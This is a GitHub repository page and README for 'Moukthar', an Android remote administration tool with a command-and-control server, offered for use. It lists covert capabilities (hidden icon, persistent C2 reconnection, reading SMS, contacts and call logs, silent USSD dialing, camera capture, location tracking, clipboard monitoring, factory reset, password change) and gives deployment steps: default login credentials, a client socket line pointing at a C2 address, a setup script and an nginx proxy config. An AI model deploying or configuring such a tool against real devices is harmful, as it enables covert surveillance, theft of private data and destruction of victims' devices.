Skip to content
forked from Tomiwa-Ot/moukthar

Android remote administration tool with C2 server

License

Notifications You must be signed in to change notification settings

haxx12/moukthar

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Moukthar

Codebase foundation for an Android Remote Administration Tool with C2 Server

Features

  • Persistent reconnection with C2 regardless if the client application is closed or placed in background or the device is restarted or current connection is interrupted
  • Hidden App Icon
  • Send/Read SMS
  • Write/Read Contacts
  • Read Call Log
  • Dial USSD code without opening dialer (API 26+)
  • Take Picture (Front/Back camera)
  • Take Screenshot
  • Make Phone Call
  • List Installed Apps
  • Vibrate Phone
  • Get Device Location
  • Change Wallpaper
  • Factory Reset Device
  • Reboot Device
  • Change Device Password
  • Clipboard Monitoring

Android Flask Java

NB

USERNAME: android
PASSWORD: the rastafarian in me

Replace the domain value with your ip/domain in __init__.py wherever you see the line

resp.set_cookie(key="", value="", expires="", domain="your ip/domain")

to enable Remember Me functionality in the Login page.

Specify the ip/domain of the C2 server in the Client app.

Socket ioSocket = IO.socket(URI.create("http://C2_ADDRESS:5001"));

Build APK

Production Environment Setup

For linux envitonments, run server/setup.sh with a privileged user to make moukthar a service.

user@pc1:~/moukthar$ chmod +x ./server/setup.sh
user@pc1:~/moukthar$ sudo ./server/setup.sh

Nginx

/etc/nginx/sites-available/moukthar

server{
    listen 80;
    server_name moukthar;
    access_log /var/log/nginx/moukthar.access.log;
    error_log /var/log/nginx/moukthar.error.log;

    location / {
       include proxy_params;
       proxy_pass https://127.0.0.1:5001;
    }
}

Screenshots

Login Page Dashboard Terminal SMS Files Reset Password Client app requesting permissions 1 Client app requesting permissions 2 Client app

Warning

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

About

Android remote administration tool with C2 server

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Java 37.2%
  • HTML 20.7%
  • Python 14.4%
  • CSS 14.3%
  • JavaScript 13.2%
  • Shell 0.2%